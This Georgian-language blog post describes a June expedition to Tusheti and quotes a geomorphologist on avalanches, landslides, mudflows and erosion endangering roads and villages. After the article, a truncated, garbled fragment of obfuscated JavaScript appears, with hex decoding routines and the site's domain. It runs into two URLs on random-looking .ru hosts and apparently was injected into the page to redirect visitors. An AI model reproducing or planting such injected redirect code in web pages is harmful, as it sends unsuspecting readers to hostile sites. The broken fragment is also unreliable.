RSS

სტიქიური პროცესები თუშეთში

10 Jun

TuSeti5 ივნის, გარემოს დაცვის საერთაშორისო დღეს, ახმეტის მუნიციპალიტეტში, თუშეთის ტერიტორიაზე მოეწყო ექსპედიცია, რომლის მიზანი გაზაფხულის სეზონზე თუშეთში არსებული ეკოლოგიური მდგომარეობის შესწავლა იყო.


„მდინარე ხისოს ალაზნის ხეობა სტიქიური პროცესებით საკმაოდ რთული ხეობაა, გამოირჩევა ზვავებით, რომლის კვალს ივნისშიც კი შეიძლება გადააწყდეთ. ზოგიერთ ადგილას, ინტენსიური ნალექის შემთხვევაში, მოსალოდნელია მეწყრული და ღვარცოფული მოვლენები და ქვათაცვენა. ძირითადად, სერპანტინების სახით წარმოდგენილ 3-კილომეტრიან მონაკვეთზე, იმ პერიოდშიც კი, როცა შესაძლებელია მიმოსვლა (წლის განმავლობაში მხოლოდ 4 თვეზეა ლაპარაკი), სტიქიური პროცესების საშიშროება მუდამ არსებობს. ბოლო 12-წლიანი მონიტორინგის საფუძველზე დავასკვენით, რომ აქ ინტენსიურად მიმდინარეობს სტიქიური პროცესები, რაც საავტომობილო გზას აზიანებს. ღვარცოფული მონაკვეთები გვხვდება სამხევის ტერიტორიაზეც, სადაც რეინჯერთა სადგურია და თუშეთის ეროვნულ პარკში შემსვლელთა ოფიციალური რეგისტრაციაც აქ მიმდინარეობს. აღსანიშნავია, რომ სოფელ ხახაბოს მიმდებარედაც ინტენსიურად მიმდინარეობს ეროზიული პროცესები, იშლება ფერდობები და თუ, მაგალითად, უახლოეს პერიოდში მის შესაჩერებლად რაიმე არ იღონეს, ცოტა ხანში ხახაბომდე მისასვლელი გზა შეიძლება საერთოდ აღარ იყოს. ეს ადგილები საშიშ რეგიონთა ნუსხაშია შეტანილი,“ – ამბობს გიორგი დვალაშვილი გეოგრაფიის აკადემიური დოქტორი, გეომორფოლოგი.
ჩვენმა კვლევამ აჩვენა, რომ გომეწრის ხეობაში მდებარე სოფელი ჯვარბოსელი, სადაც მხოლოდ ფეხით თუ მივა ადამიანი, ბოლო სამი წლის განმავლობაში დამეწყრილა. იქ გადასვლა უკვე საკმაოდ სარისკოა. მდინარე გომეწრის ალაზანი ინტენსიურად რეცხავს ნაპირს და ეროზიულმა პროცესებმა შეიძლება ისე ჩახერგოს გზა, სეზონურად მყოფი მოსახლეობა და მწყემსები საერთოდ მოწყვიტოს ცივილიზებულ სამყაროს.
„ადრე თურმე მსგავსი რამ მომხდარა, ახლა კი მისი განმეორების საშიშროებაა. იმასაც გეტყვით, რომ ეს არის ხეობა, რომლის ერთ-ერთ სოფელში – ვაკისძირში, როგორც ცნობილია, თუშეთის სახალხო გმირი ზეზვა გაფრინდაული (ბახტრიონის აჯანყების მოთავე, თუშ-ფშავ-ხევსურთა გაერთიანებული ჯარის შეკრებასა და ორგანიზაციაში ერთ-ერთი მთავარი როლი ეკავა.) ცხოვრობდა.
ძალიან სარისკოა გომეწრის ხეობის გაგრძელებაზე გზა წოვა თუშეთისკენ. აქ ძალიან ბევრ ადგილას გვხვდება ღვარცოფული კერები და, თუკი თუშეთის ჩვენ მიერ აღწერილ ნაწილში გადაადგილება მხოლოდ 100 დღის განმავლობაშია შესაძლებელი, წოვას ნასოფლარებსა და სეზონურ სოფლებში, როგორიცაა წარო, ეთელთა, ინდურთა, საგირთა და ა.შ. ფაქტობრივად, მხოლოდ აგვისტოს ბოლოს თუ გადაადგილდები, ისიც – საფეხმავლო ხიდით უნდა გადახვიდე ალაზანზე,“ – გვეუბნება გიორგი დვალაშვილი. ეს ხიდიც საკმაოდ სარისკოა, რადგან წაროსთან ინტენსიურად იშლება ფერდობი. პირიქითა თუშეთის სოფელ ფარსმასთან კი, ასე, 300-400 მეტრამდე სიგრძის ხევში, სადაც წყლის სიმაღლე ერთ მეტრს აღწევდა, საკმაოდ დიდი ღვარცოფული ნაკადი დახვდათ ექსპედიციის წარმომადგენლებს.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ekofact.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / შეცვლა )

Twitter picture

You are commenting using your Twitter account. Log Out / შეცვლა )

Facebook photo

You are commenting using your Facebook account. Log Out / შეცვლა )

Google+ photo

You are commenting using your Google+ account. Log Out / შეცვლა )

Connecting to %s